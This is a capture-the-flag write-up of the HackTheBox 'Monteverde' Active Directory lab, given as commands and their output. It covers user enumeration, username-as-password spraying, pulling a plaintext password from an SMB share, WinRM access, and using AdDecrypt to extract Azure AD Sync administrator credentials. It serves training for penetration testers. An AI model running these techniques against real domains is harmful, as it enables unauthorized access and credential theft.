Monteverde

Medium Windows Active Directory box on HackTheBox

Reconniassance

We will start off by performing a Service and Version scan on all 65535 TCP ports using nmap

nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.042s latency).
Not shown: 65517 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-03 12:12:42Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-08-03T12:13:31
|_  start_date: N/A
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug  3 13:14:12 2025 -- 1 IP address (1 host up) scanned in 122.19 seconds

As we can see we're probably facing a DC (Domain Controller) because all of the simultaneously open ports: TCP Port 88 (Kerberos) | TCP Port 135 (RPC) | TCP Port 5985 (WinRM)...

We can also enumerate the Domain Name which is MEGABANK.LOCAL so we'll add it to our /etc/hosts

We already know that methodology is the most important on Pentesting so let's enumerate everything, starting off by TCP Port 53 (DNS) and check if any record contains useful information using dig

dig @10.10.10.172 MEGABANK.LOCAL NS
...
dig @10.10.10.172 MEGABANK.LOCAL MX
...
dig @10.10.10.172 MEGABANK.LOCAL TXT
...
dig @10.10.10.172 MEGABANK.LOCAL AXFR
...

But we don't seem to find anything useful here, so let's move on onto TCP Port 88 (Kerberos) using the Kerbrute tool to try and find possible users:

kerbrute userenum --dc 10.10.10.172 -d MEGABANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 08/03/25 - Ronnie Flathers @ropnop

2025/08/03 14:44:12 >  Using KDC(s):
2025/08/03 14:44:12 >  	10.10.10.172:88

2025/08/03 14:44:20 >  [+] VALID USERNAME:	administrator@MEGABANK.LOCAL

And we found the administrator user, let's now enumerate TCP Port 135 (RPC) with a NULL session using rpcclient

rpcclient -U '' -N 10.10.10.172
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]

rpcclient $> querydispinfo
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2	Name: AAD_987d7f2f57d2	Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos	Name: Dimitris Galanos	Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope	Name: Mike Hope	Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary	Name: Ray O'Leary	Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs	Name: SABatchJobs	Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan	Name: Sally Morgan	Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata	Name: svc-ata	Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec	Name: svc-bexec	Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp	Name: svc-netapp	Desc: (null)
rpcclient $> 

We found a list of valid users which we copied into a users.txt file

As we already found valid users, let's try to perform a AS-REP Roast attack

AS-REP Roasting targets Kerberos accounts with pre-authentication disabled.

Normally, users have to prove who they are before the domain gives them a ticket. But if pre-auth is off, the server sends back a Kerberos response encrypted with the user's hash — no password needed.

We can grab that response and crack it offline to get the user's password.

And you may ask, well how do I know when to do it?

We already found valid usernames. Now we’re checking if any of them are misconfigured and can give us the Kerberos hashes, so let's try to perform the attack using impacket-GetNPUsers

impacket-GetNPUsers MEGABANK.LOCAL/ -no-pass -usersfile users.txt -format john
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

But it doesn't seem to work, so let's move on into TCP Port 445 (SMB) using Netexec (Newer versrion of CrackMapExec) as LDAP will not show any useful information either.

❯ netexec smb 10.10.10.172 -u '' -p '' --shares
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) 
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
SMB         10.10.10.172    445    MONTEVERDE       [-] Error enumerating shares: STATUS_ACCESS_DENIED

❯ netexec smb 10.10.10.172 -u '' -p '' --users
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) 
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
SMB         10.10.10.172    445    MONTEVERDE       -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.10.10.172    445    MONTEVERDE       Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.10.10.172    445    MONTEVERDE       AAD_987d7f2f57d2              2020-01-02 22:53:24 0       Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
SMB         10.10.10.172    445    MONTEVERDE       mhope                         2020-01-02 23:40:05 0        
SMB         10.10.10.172    445    MONTEVERDE       SABatchJobs                   2020-01-03 12:48:46 0        
SMB         10.10.10.172    445    MONTEVERDE       svc-ata                       2020-01-03 12:58:31 0        
SMB         10.10.10.172    445    MONTEVERDE       svc-bexec                     2020-01-03 12:59:55 0        
SMB         10.10.10.172    445    MONTEVERDE       svc-netapp                    2020-01-03 13:01:42 0        
SMB         10.10.10.172    445    MONTEVERDE       dgalanos                      2020-01-03 13:06:10 0        
SMB         10.10.10.172    445    MONTEVERDE       roleary                       2020-01-03 13:08:05 0        
SMB         10.10.10.172    445    MONTEVERDE       smorgan                       2020-01-03 13:09:21 0        
SMB         10.10.10.172    445    MONTEVERDE       [*] Enumerated 10 local users: MEGABANK

Users as passwords

But we find nothing new that we already enumerated, so let's try and see if any user is using their username as their password which is something I recommend that can even happen in real pentests.

netexec smb 10.10.10.172 -u users.txt -p users.txt --shares

---------------- SNIP -----------------
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.10.10.172    445    MONTEVERDE       [*] Enumerated shares
SMB         10.10.10.172    445    MONTEVERDE       Share           Permissions     Remark
SMB         10.10.10.172    445    MONTEVERDE       -----           -----------     ------
SMB         10.10.10.172    445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.10.10.172    445    MONTEVERDE       azure_uploads   READ            
SMB         10.10.10.172    445    MONTEVERDE       C$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       E$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.10.10.172    445    MONTEVERDE       NETLOGON        READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       SYSVOL          READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       users$          READ            

And success! We find that the user SABatchJobs is using SABatchJobs as the password for the account, we will enumerate all the readable shares using smbclient in order to extract more information.

smbclient -U 'SABatchJobs' //10.10.10.172/users$
smb: \> cd mhope
smb: \mhope\> ls
  .                                   D        0  Fri Jan  3 13:41:18 2020
  ..                                  D        0  Fri Jan  3 13:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 13:40:23 2020
  
-------- SNIP ----------

And we found that the \mhope\ shared folder contains a file called azure.xml which contains the following content:

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

Password Spraying

We notice a cleartext password — 4n0therD4y@n0th3r$ so let's perform a password spray attack using kerbrute

 kerbrute passwordspray -d MEGABANK.LOCAL --dc 10.10.10.172 users.txt '4n0therD4y@n0th3r$'

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 08/03/25 - Ronnie Flathers @ropnop

2025/08/03 14:59:57 >  Using KDC(s):
2025/08/03 14:59:57 >  	10.10.10.172:88

2025/08/03 14:59:57 >  [+] VALID LOGIN:	mhope@MEGABANK.LOCAL:4n0therD4y@n0th3r$
2025/08/03 14:59:57 >  Done! Tested 11 logins (1 successes) in 0.140 seconds

And we can see the password is valid for the user mhope

Using Netexec we noticed that this user has the WinRM connection available:

netexec winrm 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'
WINRM       10.10.10.172    5985   MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.10.172    5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)

Therefore, we can authenticate into the system using Evil-WinRM

evil-winrm -i 10.10.10.172 -u 'mhope' -p 4n0therD4y@n0th3r$ 

Privilege Escalation

With a bit of enumeration using whoami /all we notice some useful information:

*Evil-WinRM* PS C:\Users\mhope\Documents> whoami /all

USER INFORMATION
----------------

User Name      SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

It seems that we are onto the Azure Admins group, as this AD is running on Azure, let's move onto the C:\Program Files\ directory to enumerate possible privilege escalation clues:

*Evil-WinRM* PS C:\Program Files> dir


    Directory: C:\Program Files


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   9:36 PM                Common Files
d-----         1/2/2020   2:46 PM                internet explorer
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync

------------ SNIP -----------

Microsoft Azure AD Sync Abuse

After researching on Microsoft Azure AD Sync for a bit, I found an exploit that let's us see the cleartext passwords of the Domain Administrators, which is a potential privilege escalation method

For more research on this exploit ill leave the link to it's explanation

Download AdDecrypt.zip

wget https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip

Upload it to the victim machine

*Evil-WinRM* PS C:\Temp> upload mcrypt.dll
*Evil-WinRM* PS C:\Temp> upload AdDecrypt.exe

Move to the target directory, otherwise it won't work

cd "C:\Program Files\Microsoft Azure AD Sync\Bin"
# Move to the target directory
cd "C:\Program Files\Microsoft Azure AD Sync\Bin"
# Execute the exploit
C:\Temp\AdDecrypt.exe -FullSQL

Execute the exploit and retrieve the cleartext password

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Temp\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

Now let's login onto the administrator account using the d0m@in4dminyeah! password through Evil-WinRM and retrieve the flags!

evil-winrm -i 10.10.10.172 -u 'administrator' -p d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
b57c55ed9a0d5b2fb99ec3296b5ea216
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\mhope\Desktop\user.txt
130d0c9981e480b6dda335b9a35ae948

Overall realistic and interesting box, recommended for studying for the OSCP\eCPPTv3, thank you for reading this write-up and see you in the next time <3!!

Last updated